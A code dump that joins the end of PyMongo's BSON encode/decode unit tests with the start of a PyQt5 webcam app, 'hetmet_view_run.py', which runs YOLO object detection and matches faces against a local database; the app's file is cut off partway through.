a = ObjectId(b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B")
self.assertEqual(
encode({"oid": a}),
b"\x16\x00\x00\x00\x07\x6F\x69\x64\x00\x00\x01\x02"
b"\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00",
)
self.assertEqual(
encode({"ref": DBRef("coll", a)}),
b"\x2F\x00\x00\x00\x03ref\x00\x25\x00\x00\x00\x02"
b"$ref\x00\x05\x00\x00\x00coll\x00\x07$id\x00\x00"
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00"
b"\x00",
)
def test_unknown_type(self):
# Repr value differs with major python version
part = "type %r for fieldname 'foo'" % (b"\x14",)
docs = [
b"\x0e\x00\x00\x00\x14foo\x00\x01\x00\x00\x00\x00",
(b"\x16\x00\x00\x00\x04foo\x00\x0c\x00\x00\x00\x140" b"\x00\x01\x00\x00\x00\x00\x00"),
(
b" \x00\x00\x00\x04bar\x00\x16\x00\x00\x00\x030\x00\x0e\x00\x00"
b"\x00\x14foo\x00\x01\x00\x00\x00\x00\x00\x00"
),
]
for bs in docs:
try:
decode(bs)
except Exception as exc:
self.assertTrue(isinstance(exc, InvalidBSON))
self.assertTrue(part in str(exc))
else:
self.fail("Failed to raise an exception.")
def test_dbpointer(self):
# *Note* - DBPointer and DBRef are *not* the same thing. DBPointer
# is a deprecated BSON type. DBRef is a convention that does not
# exist in the BSON spec, meant to replace DBPointer. PyMongo does
# not support creation of the DBPointer type, but will decode
# DBPointer to DBRef.
bs = b"\x18\x00\x00\x00\x0c\x00\x01\x00\x00" b"\x00\x00RY\xb5j\xfa[\xd8A\xd6X]\x99\x00"
self.assertEqual({"": DBRef("", ObjectId("5259b56afa5bd841d6585d99"))}, decode(bs))
def test_bad_dbref(self):
ref_only = {"ref": {"$ref": "collection"}}
id_only = {"ref": {"$id": ObjectId()}}
self.assertEqual(ref_only, decode(encode(ref_only)))
self.assertEqual(id_only, decode(encode(id_only)))
def test_bytes_as_keys(self):
doc = {b"foo": "bar"}
# Since `bytes` are stored as Binary you can't use them
# as keys in python 3.x. Using binary data as a key makes
# no sense in BSON anyway and little sense in python.
self.assertRaises(InvalidDocument, encode, doc)
def test_datetime_encode_decode(self):
# Negative timestamps
dt1 = datetime.datetime(1, 1, 1, 1, 1, 1, 111000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(1959, 6, 25, 12, 16, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
# Positive timestamps
dt1 = datetime.datetime(9999, 12, 31, 23, 59, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(2011, 6, 14, 10, 47, 53, 444000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
def test_large_datetime_truncation(self):
# Ensure that a large datetime is truncated correctly.
dt1 = datetime.datetime(9999, 1, 1, 1, 1, 1, 999999)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt2.microsecond, 999000)
self.assertEqual(dt2.second, dt1.second)
def test_aware_datetime(self):
aware = datetime.datetime(1993, 4, 4, 2, tzinfo=FixedOffset(555, "SomeZone"))
offset = aware.utcoffset()
assert offset is not None
as_utc = (aware - offset).replace(tzinfo=utc)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45, tzinfo=utc), as_utc)
after = decode(encode({"date": aware}), CodecOptions(tz_aware=True))["date"]
self.assertEqual(utc, after.tzinfo)
self.assertEqual(as_utc, after)
def test_local_datetime(self):
# Timezone -60 minutes of UTC, with DST between April and July.
tz = DSTAwareTimezone(60, "sixty-minutes", 4, 7)
# It's not DST.
local = datetime.datetime(year=2025, month=12, hour=2, day=1, tzinfo=tz)
options = CodecOptions(tz_aware=True, tzinfo=tz)
# Encode with this timezone, then decode to UTC.
encoded = encode({"date": local}, codec_options=options)
self.assertEqual(local.replace(hour=1, tzinfo=None), decode(encoded)["date"])
# It's DST.
local = datetime.datetime(year=2025, month=4, hour=1, day=1, tzinfo=tz)
encoded = encode({"date": local}, codec_options=options)
self.assertEqual(
local.replace(month=3, day=31, hour=23, tzinfo=None), decode(encoded)["date"]
)
# Encode UTC, then decode in a different timezone.
encoded = encode({"date": local.replace(tzinfo=utc)})
decoded = decode(encoded, options)["date"]
self.assertEqual(local.replace(hour=3), decoded)
self.assertEqual(tz, decoded.tzinfo)
# Test round-tripping.
self.assertEqual(
local, decode(encode({"date": local}, codec_options=options), options)["date"]
)
# Test around the Unix Epoch.
epochs = (
EPOCH_AWARE,
EPOCH_AWARE.astimezone(FixedOffset(120, "one twenty")),
EPOCH_AWARE.astimezone(FixedOffset(-120, "minus one twenty")),
)
utc_co = CodecOptions(tz_aware=True)
for epoch in epochs:
doc = {"epoch": epoch}
# We always retrieve datetimes in UTC unless told to do otherwise.
self.assertEqual(EPOCH_AWARE, decode(encode(doc), codec_options=utc_co)["epoch"])
# Round-trip the epoch.
local_co = CodecOptions(tz_aware=True, tzinfo=epoch.tzinfo)
self.assertEqual(epoch, decode(encode(doc), codec_options=local_co)["epoch"])
def test_naive_decode(self):
aware = datetime.datetime(1993, 4, 4, 2, tzinfo=FixedOffset(555, "SomeZone"))
offset = aware.utcoffset()
assert offset is not None
naive_utc = (aware - offset).replace(tzinfo=None)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45), naive_utc)
after = decode(encode({"date": aware}))["date"]
self.assertEqual(None, after.tzinfo)
self.assertEqual(naive_utc, after)
def test_dst(self):
d = {"x": datetime.datetime(1993, 4, 4, 2)}
self.assertEqual(d, decode(encode(d)))
@unittest.skip("Disabled due to http://bugs.python.org/issue25222")
def test_bad_encode(self):
evil_list: dict = {"a": []}
evil_list["a"].append(evil_list)
evil_dict: dict = {}
evil_dict["a"] = evil_dict
for evil_data in [evil_dict, evil_list]:
self.assertRaises(Exception, encode, evil_data)
def test_overflow(self):
self.assertTrue(encode({"x": 9223372036854775807}))
self.assertRaises(OverflowError, encode, {"x": 9223372036854775808})
self.assertTrue(encode({"x": -9223372036854775808}))
self.assertRaises(OverflowError, encode, {"x": -9223372036854775809})
def test_small_long_encode_decode(self):
encoded1 = encode({"x": 256})
decoded1 = decode(encoded1)["x"]
self.assertEqual(256, decoded1)
self.assertEqual(type(256), type(decoded1))
encoded2 = encode({"x": Int64(256)})
decoded2 = decode(encoded2)["x"]
expected = Int64(256)
self.assertEqual(expected, decoded2)
self.assertEqual(type(expected), type(decoded2))
self.assertNotEqual(type(decoded1), type(decoded2))
def test_tuple(self):
self.assertEqual({"tuple": [1, 2]}, decode(encode({"tuple": (1, 2)})))
def test_uuid(self):
id = uuid.uuid4()
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, "cannot encode native uuid"):
bson.decode_all(encode({"uuid": id}))
opts = CodecOptions(uuid_representation=UuidRepresentation.STANDARD)
transformed_id = decode(encode({"id": id}, codec_options=opts), codec_options=opts)["id"]
self.assertTrue(isinstance(transformed_id, uuid.UUID))
self.assertEqual(id, transformed_id)
self.assertNotEqual(uuid.uuid4(), transformed_id)
def test_uuid_legacy(self):
id = uuid.uuid4()
legacy = Binary.from_uuid(id, UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(3, legacy.subtype)
bin = decode(encode({"uuid": legacy}))["uuid"]
self.assertTrue(isinstance(bin, Binary))
transformed = bin.as_uuid(UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(id, transformed)
# The C extension was segfaulting on unicode RegExs, so we have this test
# that doesn't really test anything but the lack of a segfault.
def test_unicode_regex(self):
regex = re.compile("revisi\xf3n")
decode(encode({"regex": regex}))
def test_non_string_keys(self):
self.assertRaises(InvalidDocument, encode, {8.9: "test"})
def test_utf8(self):
w = {"aéあ": "aéあ"}
self.assertEqual(w, decode(encode(w)))
# b'a\xe9' == "aé".encode("iso-8859-1")
iso8859_bytes = b"a\xe9"
y = {"hello": iso8859_bytes}
# Stored as BSON binary subtype 0.
out = decode(encode(y))
self.assertTrue(isinstance(out["hello"], bytes))
self.assertEqual(out["hello"], iso8859_bytes)
def test_null_character(self):
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
self.assertRaises(InvalidDocument, encode, {b"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"a": re.compile(b"ab\x00c")})
self.assertRaises(InvalidDocument, encode, {"a": re.compile("ab\x00c")})
def test_move_id(self):
self.assertEqual(
b"\x19\x00\x00\x00\x02_id\x00\x02\x00\x00\x00a\x00"
b"\x02a\x00\x02\x00\x00\x00a\x00\x00",
encode(SON([("a", "a"), ("_id", "a")])),
)
self.assertEqual(
b"\x2c\x00\x00\x00"
b"\x02_id\x00\x02\x00\x00\x00b\x00"
b"\x03b\x00"
b"\x19\x00\x00\x00\x02a\x00\x02\x00\x00\x00a\x00"
b"\x02_id\x00\x02\x00\x00\x00a\x00\x00\x00",
encode(SON([("b", SON([("a", "a"), ("_id", "a")])), ("_id", "b")])),
)
def test_dates(self):
doc = {"early": datetime.datetime(1686, 5, 5), "late": datetime.datetime(2086, 5, 5)}
try:
self.assertEqual(doc, decode(encode(doc)))
except ValueError:
# Ignore ValueError when no C ext, since it's probably
# a problem w/ 32-bit Python - we work around this in the
# C ext, though.
if bson.has_c():
raise
def test_custom_class(self):
self.assertIsInstance(decode(encode({})), dict)
self.assertNotIsInstance(decode(encode({})), SON)
self.assertIsInstance(decode(encode({}), CodecOptions(document_class=SON)), SON)
self.assertEqual(1, decode(encode({"x": 1}), CodecOptions(document_class=SON))["x"])
x = encode({"x": [{"y": 1}]})
self.assertIsInstance(decode(x, CodecOptions(document_class=SON))["x"][0], SON)
def test_subclasses(self):
# make sure we can serialize subclasses of native Python types.
class _myint(int):
pass
class _myfloat(float):
pass
class _myunicode(str):
pass
d = {"a": _myint(42), "b": _myfloat(63.9), "c": _myunicode("hello world")}
d2 = decode(encode(d))
for key, value in d2.items():
orig_value = d[key]
orig_type = orig_value.__class__.__bases__[0]
self.assertEqual(type(value), orig_type)
self.assertEqual(value, orig_type(value))
def test_ordered_dict(self):
d = OrderedDict([("one", 1), ("two", 2), ("three", 3), ("four", 4)])
self.assertEqual(d, decode(encode(d), CodecOptions(document_class=OrderedDict)))
def test_bson_regex(self):
# Invalid Python regex, though valid PCRE.
bson_re1 = Regex(r"[\w-\.]")
self.assertEqual(r"[\w-\.]", bson_re1.pattern)
self.assertEqual(0, bson_re1.flags)
doc1 = {"r": bson_re1}
doc1_bson = (
b"\x11\x00\x00\x00" b"\x0br\x00[\\w-\\.]\x00\x00" b"\x00" # document length # r: regex
) # document terminator
self.assertEqual(doc1_bson, encode(doc1))
self.assertEqual(doc1, decode(doc1_bson))
# Valid Python regex, with flags.
re2 = re.compile(".*", re.I | re.M | re.S | re.U | re.X)
bson_re2 = Regex(".*", re.I | re.M | re.S | re.U | re.X)
doc2_with_re = {"r": re2}
doc2_with_bson_re = {"r": bson_re2}
doc2_bson = (
b"\x11\x00\x00\x00" b"\x0br\x00.*\x00imsux\x00" b"\x00" # document length # r: regex
) # document terminator
self.assertEqual(doc2_bson, encode(doc2_with_re))
self.assertEqual(doc2_bson, encode(doc2_with_bson_re))
self.assertEqual(re2.pattern, decode(doc2_bson)["r"].pattern)
self.assertEqual(re2.flags, decode(doc2_bson)["r"].flags)
def test_regex_from_native(self):
self.assertEqual(".*", Regex.from_native(re.compile(".*")).pattern)
self.assertEqual(0, Regex.from_native(re.compile(b"")).flags)
regex = re.compile(b"", re.I | re.L | re.M | re.S | re.X)
self.assertEqual(re.I | re.L | re.M | re.S | re.X, Regex.from_native(regex).flags)
unicode_regex = re.compile("", re.U)
self.assertEqual(re.U, Regex.from_native(unicode_regex).flags)
def test_regex_hash(self):
self.assertRaises(TypeError, hash, Regex("hello"))
def test_regex_comparison(self):
re1 = Regex("a")
re2 = Regex("b")
self.assertNotEqual(re1, re2)
re1 = Regex("a", re.I)
re2 = Regex("a", re.M)
self.assertNotEqual(re1, re2)
re1 = Regex("a", re.I)
re2 = Regex("a", re.I)
self.assertEqual(re1, re2)
def test_exception_wrapping(self):
# No matter what exception is raised while trying to decode BSON,
# the final exception always matches InvalidBSON.
# {'s': '\xff'}, will throw attempting to decode utf-8.
bad_doc = b"\x0f\x00\x00\x00\x02s\x00\x03\x00\x00\x00\xff\x00\x00\x00"
with self.assertRaises(InvalidBSON) as context:
decode_all(bad_doc)
self.assertIn("codec can't decode byte 0xff", str(context.exception))
def test_minkey_maxkey_comparison(self):
# MinKey's <, <=, >, >=, !=, and ==.
self.assertTrue(MinKey() < None)
self.assertTrue(MinKey() < 1)
self.assertTrue(MinKey() <= 1)
self.assertTrue(MinKey() <= MinKey())
self.assertFalse(MinKey() > None)
self.assertFalse(MinKey() > 1)
self.assertFalse(MinKey() >= 1)
self.assertTrue(MinKey() >= MinKey())
self.assertTrue(MinKey() != 1)
self.assertFalse(MinKey() == 1)
self.assertTrue(MinKey() == MinKey())
# MinKey compared to MaxKey.
self.assertTrue(MinKey() < MaxKey())
self.assertTrue(MinKey() <= MaxKey())
self.assertFalse(MinKey() > MaxKey())
self.assertFalse(MinKey() >= MaxKey())
self.assertTrue(MinKey() != MaxKey())
self.assertFalse(MinKey() == MaxKey())
# MaxKey's <, <=, >, >=, !=, and ==.
self.assertFalse(MaxKey() < None)
self.assertFalse(MaxKey() < 1)
self.assertFalse(MaxKey() <= 1)
self.assertTrue(MaxKey() <= MaxKey())
self.assertTrue(MaxKey() > None)
self.assertTrue(MaxKey() > 1)
self.assertTrue(MaxKey() >= 1)
self.assertTrue(MaxKey() >= MaxKey())
self.assertTrue(MaxKey() != 1)
self.assertFalse(MaxKey() == 1)
self.assertTrue(MaxKey() == MaxKey())
# MaxKey compared to MinKey.
self.assertFalse(MaxKey() < MinKey())
self.assertFalse(MaxKey() <= MinKey())
self.assertTrue(MaxKey() > MinKey())
self.assertTrue(MaxKey() >= MinKey())
self.assertTrue(MaxKey() != MinKey())
self.assertFalse(MaxKey() == MinKey())
def test_minkey_maxkey_hash(self):
self.assertEqual(hash(MaxKey()), hash(MaxKey()))
self.assertEqual(hash(MinKey()), hash(MinKey()))
self.assertNotEqual(hash(MaxKey()), hash(MinKey()))
def test_timestamp_comparison(self):
# Timestamp is initialized with time, inc. Time is the more
# significant comparand.
self.assertTrue(Timestamp(1, 0) < Timestamp(2, 17))
self.assertTrue(Timestamp(2, 0) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 7) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(2, 0) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(2, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(2, 0))
# Comparison by inc.
self.assertTrue(Timestamp(1, 0) < Timestamp(1, 1))
self.assertTrue(Timestamp(1, 1) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 1))
self.assertFalse(Timestamp(1, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(1, 0) >= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 1) >= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 1) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(1, 0))
def test_timestamp_highorder_bits(self):
doc = {"a": Timestamp(0xFFFFFFFF, 0xFFFFFFFF)}
doc_bson = b"\x10\x00\x00\x00" b"\x11a\x00\xff\xff\xff\xff\xff\xff\xff\xff" b"\x00"
self.assertEqual(doc_bson, encode(doc))
self.assertEqual(doc, decode(doc_bson))
def test_bad_id_keys(self):
self.assertRaises(InvalidDocument, encode, {"_id": {"$bad": 123}}, True)
self.assertRaises(
InvalidDocument, encode, {"_id": {"$oid": "52d0b971b3ba219fdeb4170e"}}, True
)
encode({"_id": {"$oid": "52d0b971b3ba219fdeb4170e"}})
def test_bson_encode_thread_safe(self):
def target(i):
for j in range(1000):
my_int = type("MyInt_%s_%s" % (i, j), (int,), {})
bson.encode({"my_int": my_int()})
threads = [ExceptionCatchingThread(target=target, args=(i,)) for i in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertIsNone(t.exc)
def test_raise_invalid_document(self):
class Wrapper(object):
def __init__(self, val):
self.val = val
def __repr__(self):
return repr(self.val)
self.assertEqual("1", repr(Wrapper(1)))
with self.assertRaisesRegex(
InvalidDocument, "cannot encode object: 1, of type: " + repr(Wrapper)
):
encode({"t": Wrapper(1)})
class TestCodecOptions(unittest.TestCase):
def test_document_class(self):
self.assertRaises(TypeError, CodecOptions, document_class=object)
self.assertIs(SON, CodecOptions(document_class=SON).document_class)
def test_tz_aware(self):
self.assertRaises(TypeError, CodecOptions, tz_aware=1)
self.assertFalse(CodecOptions().tz_aware)
self.assertTrue(CodecOptions(tz_aware=True).tz_aware)
def test_uuid_representation(self):
self.assertRaises(ValueError, CodecOptions, uuid_representation=7)
self.assertRaises(ValueError, CodecOptions, uuid_representation=2)
def test_tzinfo(self):
self.assertRaises(TypeError, CodecOptions, tzinfo="pacific")
tz = FixedOffset(42, "forty-two")
self.assertRaises(ValueError, CodecOptions, tzinfo=tz)
self.assertEqual(tz, CodecOptions(tz_aware=True, tzinfo=tz).tzinfo)
def test_codec_options_repr(self):
r = (
"CodecOptions(document_class=dict, tz_aware=False, "
"uuid_representation=UuidRepresentation.UNSPECIFIED, "
"unicode_decode_error_handler='strict', "
"tzinfo=None, type_registry=TypeRegistry(type_codecs=[], "
"fallback_encoder=None))"
)
self.assertEqual(r, repr(CodecOptions()))
def test_decode_all_defaults(self):
# Test decode_all()'s default document_class is dict and tz_aware is
# False.
doc = {"sub_document": {}, "dt": datetime.datetime.utcnow()}
decoded = bson.decode_all(bson.encode(doc))[0]
self.assertIsInstance(decoded["sub_document"], dict)
self.assertIsNone(decoded["dt"].tzinfo)
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, "cannot encode native uuid"):
bson.decode_all(bson.encode({"uuid": uuid.uuid4()}))
def test_unicode_decode_error_handler(self):
enc = encode({"keystr": "foobar"})
# Test handling of bad key value, bad string value, and both.
invalid_key = enc[:7] + b"\xe9" + enc[8:]
invalid_val = enc[:18] + b"\xe9" + enc[19:]
invalid_both = enc[:7] + b"\xe9" + enc[8:18] + b"\xe9" + enc[19:]
# Ensure that strict mode raises an error.
for invalid in [invalid_key, invalid_val, invalid_both]:
self.assertRaises(
InvalidBSON, decode, invalid, CodecOptions(unicode_decode_error_handler="strict")
)
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions())
self.assertRaises(InvalidBSON, decode, invalid)
# Test all other error handlers.
for handler in ["replace", "backslashreplace", "surrogateescape", "ignore"]:
expected_key = b"ke\xe9str".decode("utf-8", handler)
expected_val = b"fo\xe9bar".decode("utf-8", handler)
doc = decode(invalid_key, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: "foobar"})
doc = decode(invalid_val, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {"keystr": expected_val})
doc = decode(invalid_both, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: expected_val})
# Test handling bad error mode.
dec = decode(enc, CodecOptions(unicode_decode_error_handler="junk"))
self.assertEqual(dec, {"keystr": "foobar"})
self.assertRaises(
InvalidBSON, decode, invalid_both, CodecOptions(unicode_decode_error_handler="junk")
)
def round_trip_pickle(self, obj, pickled_with_older):
pickled_with_older_obj = pickle.loads(pickled_with_older)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
pkl = pickle.dumps(obj, protocol=protocol)
obj2 = pickle.loads(pkl)
self.assertEqual(obj, obj2)
self.assertEqual(pickled_with_older_obj, obj2)
def test_regex_pickling(self):
reg = Regex(".?")
pickled_with_3 = (
b"\x80\x04\x959\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.regex\x94\x8c\x05Regex\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x07pattern\x94\x8c\x02.?\x94\x8c\x05flag"
b"s\x94K\x00ub."
)
self.round_trip_pickle(reg, pickled_with_3)
def test_timestamp_pickling(self):
ts = Timestamp(0, 1)
pickled_with_3 = (
b"\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0ebson.timestamp\x94\x8c\tTimestamp\x94\x93\x94)"
b"\x81\x94}\x94("
b"\x8c\x10_Timestamp__time\x94K\x00\x8c"
b"\x0f_Timestamp__inc\x94K\x01ub."
)
self.round_trip_pickle(ts, pickled_with_3)
def test_dbref_pickling(self):
dbr = DBRef("foo", 5)
pickled_with_3 = (
b"\x80\x04\x95q\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94"
b"\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database"
b"\x94N\x8c\x0e_DBRef__kwargs\x94}\x94ub."
)
self.round_trip_pickle(dbr, pickled_with_3)
dbr = DBRef("foo", 5, database="db", kwargs1=None)
pickled_with_3 = (
b"\x80\x04\x95\x81\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\nbson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94"
b"\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database"
b"\x94\x8c\x02db\x94\x8c\x0e_DBRef__kwargs\x94}\x94"
b"\x8c\x07kwargs1\x94Nsub."
)
self.round_trip_pickle(dbr, pickled_with_3)
def test_minkey_pickling(self):
mink = MinKey()
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0cbson.min_key\x94\x8c\x06MinKey\x94\x93\x94)"
b"\x81\x94."
)
self.round_trip_pickle(mink, pickled_with_3)
def test_maxkey_pickling(self):
maxk = MaxKey()
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0cbson.max_key\x94\x8c\x06MaxKey\x94\x93\x94)"
b"\x81\x94."
)
self.round_trip_pickle(maxk, pickled_with_3)
def test_int64_pickling(self):
i64 = Int64(9)
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.int64\x94\x8c\x05Int64\x94\x93\x94K\t\x85\x94"
b"\x81\x94."
)
self.round_trip_pickle(i64, pickled_with_3)
def test_bson_encode_decode(self) -> None:
doc = {"_id": ObjectId()}
encoded = bson.encode(doc)
decoded = bson.decode(encoded)
encoded = bson.encode(decoded)
decoded = bson.decode(encoded)
# Documents returned from decode are mutable.
decoded["new_field"] = 1
self.assertTrue(decoded["_id"].generation_time)
if __name__ == "__main__":
unittest.main()
|
hetmet_view_run.py
|
from json import JSONDecoder
import cv2
import time
import threading
import sys
import dialog
from dialog_1 import Ui_Dialog
from PyQt5.QtWidgets import QApplication,QDialog,QLabel
from PyQt5.QtGui import QImage,QPixmap
from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtMultimedia import (QCameraInfo,QCameraImageCapture,
QImageEncoderSettings,QMultimedia,QVideoFrame,QSound,QCamera)
########################################
## 导入识别库
import colorsys
import os
from timeit import default_timer as timer
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from PIL import Image, ImageFont, ImageDraw
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
from FaceDetect import FaceDetect
import face_recognition
import sqlact
#############################################
# Face++官方接口封装
result=""
class Dialog(QDialog):
def __init__(self, parent=None):
super().__init__(parent)
self.detector = FaceDetect(0, 'facedata')
self.encoding_list, self.name_list = self.detector.get_name_list()
self._ui = Ui_Dialog()
self._ui.setupUi(self)
# self._ui.lineEdit.setText("路程")
self.camera = None
cameras = QCameraInfo.availableCameras()
if len(cameras) > 0:
self.__initCamera()
self.__initImageCapture()
self.camera.start()
def __initCamera(self):
camInfo = QCameraInfo.defaultCamera()
self.camera = QCamera(camInfo)
self.camera.setViewfinder(self._ui.widget)
self.camera.setCaptureMode(QCamera.CaptureStillImage)
def __initImageCapture(self):
self.capture = QCameraImageCapture(self.camera)
setting = QImageEncoderSettings()
setting.setCodec("image/jpeg")
self.capture.setEncodingSettings(setting)
self.capture.setBufferFormat(QVideoFrame.Format_Jpeg)
self.capture.setCaptureDestination(QCameraImageCapture.CaptureToFile)
self.capture.capture(file="D:/qt5design/wt.jpg")
self.capture.imageCaptured.connect(self.do_imageCaptured)
def accept(self):
pass
def reject(self):
pass
@pyqtSlot()
def on_pushButton_clicked(self):#开启摄像头识别
global result
self.camera.stop()
self.camera.searchAndLock()
self.camera.unlock()
face_name =[]
yolo = YOLO()
output_path = ""
vid =cv2.VideoCapture(0,cv2.CAP_DSHOW)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))
video_fps = vid.get(cv2.CAP_PROP_FPS)
video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
isOutput = True if output_path != "" else False
if isOutput:
print("!!! TYPE:", type(output_path), type(video_FourCC), type(video_fps), type(video_size))
out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
return_value, frame = vid.read()
image = Image.fromarray(frame)
image = yolo.detect_image(image)
result_1 = np.asarray(image)
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
cv2.putText(result_1, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.50, color=(255, 0, 0), thickness=2)
test_locations = face_recognition.face_locations(result_1)
test_encodings = face_recognition.face_encodings(result_1, test_locations)
for face_encoding in test_encodings:
face_distances = face_recognition.face_distance(self.encoding_list, face_encoding)
best_index = np.argmin(face_distances)
if face_distances[best_index] <= 0.55:
re_name = sqlact.search_by_path("face", self.name_list[best_index])
if yolo.label == "person":
sqlact.update_one_sql("face", self.name_list[best_index])
face_name.append(re_name[0][1])
else:
face_name.append("unknown")
for i, (top, right, bottom, left) in enumerate(test_locations):
name = face_name[i]
cv2.putText(result_1, name, (left + 6, bottom + 15), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 1)
cv2.imshow("FaceReconition", result_1)
# cv2.namedWindow("result", cv2.WINDOW_NORMAL)
# cv2.imshow("result", result_1)
# show_2 = cv2.resize(result_1, (521, 481))
# show_3 = cv2.cvtColor(show_2, cv2.COLOR_BGR2RGB)
# detect_image = QImage(show_3.data, show_3.shape[1], show_3.shape[0], QImage.Format_RGB888)
# self._ui.widget(QPixmap.fromImage(detect_image))
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyWindow("FaceReconition")
vid.release()
break
yolo.close_session()
time.sleep(2)
view = sqlact.search_all_sql()
re = [str(t) for i in view for t in i]
li = ""
for i in range(len(re)):
if i % 2 == 0 and i != 0:
li += "\n"
li += re[i] + " "
result = li
self._ui.lineEdit.setText(result)
def on_pushButton_2_clicked(self):#返回
self.camera.stop()
self.close()
def do_imageCaptured(self,imageID,preview):
pass
def lineeditset(self):
self.lineEdit.setText(result)
###################################################
# 添加摄像头所需 YOLO 对象
class YOLO(object):
_defaults = {
"model_path": 'trained_weights_stage_1.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/voc_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"gpu_num" : 1,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
self.__dict__.update(self._defaults) # set up default values
self.__dict__.update(kwargs) # and update with user overrides
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
self.label =""
def _get_class(self):
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# Load model, or construct model and load weights.
num_anchors = len(self.anchors)
num_classes = len(self.class_names)
is_tiny_version = num_anchors==6 # default setting
try:
self.yolo_model = load_model(model_path, compile=False)
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
